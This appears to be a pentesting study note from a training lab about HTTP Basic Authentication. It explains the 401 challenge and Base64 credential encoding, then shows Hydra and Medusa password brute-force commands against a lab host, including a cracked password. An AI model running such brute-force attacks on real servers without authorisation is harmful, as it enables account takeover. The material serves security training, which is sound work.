BASIC HTTP AUTHENTICATION
Basic Authentication is an authentication mechanism used to protect sensitive data and functionalities of web applications. this is a challenge-response protocol where a web server demands user credentials before granting access to protected resources. The process begins when a user attempts to access a restricted area. The server responds with a 401 Unauthorized status and a WWW-Authenticate header prompting the user's browser to present a login dialog. Once the user provides their username and password, the browser concatenates them into a single string, separated by a colon. This string is then encoded using Base64 and included in the Authentication header of subsequent requests, following the format Basic <encodedCredentials>. The server decodes the credentials, verifies them against its database, and grants or denies access accordingly.
BASIC AUTHENTICATION GUI
WEB LOGIN FORM GUI
EXAMPLE HTTP GET BASIC AUTH
GET /protected_resource HTTP/1.1
Host: www.example.com
Authorization: Basic YWxpY2U6c2VjcmV0MTIz
root@oco:~$ echo -n YWxpY2U6c2VjcmV0MTIz | base64 -d
* alice:secret123HYDRA
root@htb:~$ curl -s -O https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/2023-200_most_used_passwords.txt
* the -s means silent mode. it suppresses the progress bar and error messages, providing a cleaner output
root@htb:~$ hydra -l basic-auth-user -P 2023-200_most_used_passwords.txt 94.237.55.60 http-get / -s 43574
* [43574][http-get] host: 94.237.55.60 login: basic-auth-user password: Password@123
root@htb:~$ curl -u basic-auth-user:'Password@123' 94.237.55.60:43574MEDUSA
root@oco:~$ nano webServers.txt
...
roto@oco:~$ nano usernames.txt
...
root@oco~:$ nano passwords.txt
...
root@oco:~$ medusa -H web_servers.txt -U usernames.txt -P passwords.txt -M http -m GET -t 64Last updated